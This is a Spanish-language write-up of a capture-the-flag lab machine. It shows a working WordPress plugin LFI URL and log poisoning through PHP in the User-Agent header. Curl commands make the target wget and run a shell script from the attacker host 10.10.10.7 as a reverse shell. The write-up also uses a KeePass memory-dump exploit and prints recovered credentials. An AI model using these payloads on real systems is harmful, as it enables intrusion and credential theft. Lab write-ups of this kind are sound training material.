Hacemos el escaneo con nmap:
Al estar abierto el puerto 111, vemos 3 monturas en el sistema:
Nos traemos cada una de estas monturas con el comando mount:
mount 10.10.10.5:/shared/tmp/ /mnt/montura/ mount 10.10.10.5:/shared/j4ckie/ /mnt/montura_condor/ mount 10.10.10.5:/shared/condor/ /mnt/montura/
En esta parte no encontramos nada, pero si hacemos fuzzing web, nos encontramos con un wordpress:
Al ponerlo en el navegador nos da un error, pero sí nos reporta un dominio shared.nyx:
Lo añadimos al fichero /hosts:
Y nos funciona:
Tras hacer una enumeración agresiva de plugins con wpscan, vemos un plugin algo desactualizado:
wpscan --url http://shared.nyx/wordpress/ -U admin -P /usr/share/wordlists/rockyou.txt
El cual vemos que en principio es vulnerable a un LFI:
Y dentro de este primer enlace nos encontramos con unas instrucciones de cómo explotar el LFI:
Lo probamos y funciona:
http://shared.nyx/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
Probamos la ruta para explotar un log poisoning y funciona:
http://shared.nyx/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/log/apache2/access.log
Lanzamos un comando con curl, por ejemplo whoami:
curl -s -X GET 'http://shared.nyx/wordpress/' -H "User-Agent: <?php system('whoami'); ?>"
Y dentro de los logs vemos que se ha ejecutado el comando:
Nos creamos una reverse shell y la compartimos con la máquina víctima:
curl -s -X GET 'http://shared.nyx/wordpress/' -H "User-Agent: <?php system('wget 10.10.10.7/shell.sh'); ?>" curl -s -X GET 'http://shared.nyx/wordpress/' -H "User-Agent: <?php system('chmod 777 shell.sh'); ?>" curl -s -X GET 'http://shared.nyx/wordpress/' -H "User-Agent: <?php system('bash shell.sh'); ?>"
Y estamos dentro:
Y dentro del directorio de wordpress, tenemos el archivo de wp.config.php, donde se guardan credenciales de bases de datos:
wordpress:R9o17ONkbFk2BrRHG7zY
Accedemos a la base de datos:
mysql -u wordpress -pR9o17ONkbFk2BrRHG7z
Y tenemos una tabla de wp-users donde tenemos credenciales:
admin:$P$BEFipQ4xz8hMCnY7kD7lwLTfrDENmN/
Pero por aquí no viene la intrusión, aunque si vamos al directorio /var/www/html/wordpress/backups nos encontramos con un archivo .zip, que debemos descomprimir y nos dará una base de datos de keepass:
unzip cp-sharedbbdd.zip
Nos compartimos esta base de datos y el archivo .tmp a nuestra máquina atacante:
Al tener el keepass y el .dmp, podemos explotar una vulnerabilidad, la CVE-2023-32784, donde podemos obtener la PoC del siguiente repositorio de github:
https://github.com/z-jxy/keepass_dump
Y ejecutamos el siguiente comando:
python3 keepass_dump.py -f KeePass.DMP --skip --debug
La contraseña sería Shared123%, por lo que abrimos la base de datos:
Y dentro de esta base de datos obtenemos las siguientes credenciales:
condor:OjNIhkKb2tUnmChoFnJI j4ckie:p8Ucx8ab2N8AIfmP83E8 jackondor:7iwylOTHddtPakkgTJV9
La contraseña de jackondor vemos que funciona:


























